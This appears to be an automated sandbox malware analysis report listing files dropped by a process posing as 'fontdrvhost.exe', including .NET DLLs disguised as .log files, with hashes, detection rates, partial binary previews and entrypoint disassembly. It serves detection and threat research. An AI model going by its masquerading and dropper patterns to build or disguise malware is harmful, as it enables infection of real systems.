SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\BimGJlFQ.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: U1jaLbTw1f.exe, Detection: malicious, Browse Filename: voed9G7p5s.exe, Detection: malicious, Browse Filename: Etqq32Yuw4.exe, Detection: malicious, Browse Filename: KzLetzDiM8.exe, Detection: malicious, Browse Filename: f3I38kv.exe, Detection: malicious, Browse Filename: aimware.exe, Detection: malicious, Browse Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse Filename: r6cRyCpdfS.exe, Detection: malicious, Browse Filename: tBnELFfQoe.exe, Detection: malicious, Browse Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\CANODYsk.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\LRGWtOLy.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\MihenAyR.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\RKjvWuQm.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aFStzZSn.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bsCLGWVU.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\iIcaGucE.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jWKBqQkB.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jqKBOCJa.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\knlJjCXV.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\sRuyTvnC.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\szTqaJAi.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.529329139831718
Encrypted:	false
SSDEEP:	384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
MD5:	8AE2B8FA17C9C4D99F76693A627307D9
SHA1:	7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
SHA-256:	0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
SHA-512:	DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tWFZTedC.log

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.529329139831718
Encrypted:	false
SSDEEP:	384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
MD5:	8AE2B8FA17C9C4D99F76693A627307D9
SHA1:	7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
SHA-256:	0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
SHA-512:	DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1991168
Entropy (8bit):	7.5618921450859276
Encrypted:	false
SSDEEP:	49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
MD5:	BA58757137700B6B304B45298D986EB1
SHA1:	9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
SHA-256:	62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
SHA-512:	296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9......8....(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..

C:\Windows\Downloaded Program Files\f8dafbcfe7f5f1

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with very long lines (588), with no line terminators
Category:	dropped
Size (bytes):	588
Entropy (8bit):	5.890203161219501
Encrypted:	false
SSDEEP:	12:s7EGPDrRk3+Amm1IR1vQdLr1T+Ic20SMxCjVBbigYixeiS9mcMn:70C+AbIRRQR9+8AdgDCmcM
MD5:	A9EEFFD05D92E327CA8F367CB0CA5E7B
SHA1:	ACF91F84222CC4EBA2AD2B625EE47FB0EA6EED00
SHA-256:	74C0C0819242F05E6D55311B01E95FD9FFB73E1B3F0C393F354CA9A2194A557A
SHA-512:	1751323A8B59F4B95F1CEF8A0FEA20171B34028534388BD4F44DF84596A8130C7CB83CBC38E1DE9EB5D55AFA5A5971E1C9BE11B6D8A5AD2FAF7681AF94ECB3D2
Malicious:	false
Preview:	HeYbwQuWzmdIvVPrzb42pQ8DKH5eAls4jw7vLUQSD4tGChswMbqZHW40fVQpVPVN3ij9YegeLmyuh2AnZIRi5TwN1GQzEk6xifNd7sYs5LOfhKSmUmQM7xSjvWIROqakpALCphpqujntERpqynebUtzvNnrljGdOvnzh8Q7x7jcYJifeqcdkL8Q6KayBzDGoFY8bcIshpreuRblpIN5Hm2CxX3Wib583dxSvjDBiu65eefosyJ3lI8BNVLDjwJFttkReJ0FEMWXq7iS2PntSCWuevFZYAcwk0Lv3OJj7DzZvlVPx2KUIZxrWzwsEbqDukxzwxZoFEwON793azmg0HnKDeYEbbegWvoLxfdAdgPDnieY03SOzKNm6nwRYUMnjQ2bSxF4WmDT2kgeAANhIPqMiCOKsLlIUldXqCFCyY2NH3tWGRRXHofUjp3Pj4LKA59RGJy74LtuXdEoT1Eb3NApFJxAJzc4MsNM4bQ7dUd65u6GkO6szuRw4TL6VxxEsyhpP2t1kH7juEuUNqZ43uEcaaRlPUlpgYOGMR0reEHswrBzi1toY2L7uFOzkIlPfSCW0oH50raym

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.618543484589417
Encrypted:	false
SSDEEP:	12:PrS5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:gdUOAokItULVDv
MD5:	4DBEFFEDC5A0C766CC738CB031B97382
SHA1:	A28348DF32AE7C992201A7893DDCCE39638F5DB6
SHA-256:	D1C202BA26D1A32C2060CF1231E5CDA0621E84DB3EE32985C7151E0A2E2D081F
SHA-512:	ACE73ECFFCCF8775525BD45FDDE356AE95FD8ED293F079E10AC7ECD0575EB302EF96AF9297BEFEE017120659CC598C4F33272A3A052D1951574776234A127709
Malicious:	false
Preview:	..Pinging 571345 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.498817961639936
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	YGk3y6Tdix.exe
File size:	2'312'934 bytes
MD5:	e38b0fc914530e6682d067159b0c7c34
SHA1:	4661a00c6e199b1277b2af3bb72e5ebc22cbe2d3
SHA256:	476f2ddc0f7c7ef512c71a6faadfead61424d57abf2e4566d48b8dd84545c6cb
SHA512:	2a3fbec39991a98808e30ae453cfd9ff7b77f20af5821e4cc0167553e4df687e1ada2c1e35f4b9168f276789029b0de6aa5c11e34b58926ac6e0b6a80046c9d4
SSDEEP:	49152:IBJ3j0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8ZM:ylj0voZ4YqIdCho9YLi6lG+ZM
TLSH:	0DB5BF0679928F73C2615732866B163D42A0D7263A22EF1B375F10D2AD177F19E722B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F368483D0DBh
jmp 00007F368483C9EDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F368482F837h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F368483FE7Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F368483CB7Ch
push 0000000Ch
push esi
call 00007F368483C139h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F368482F7B2h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
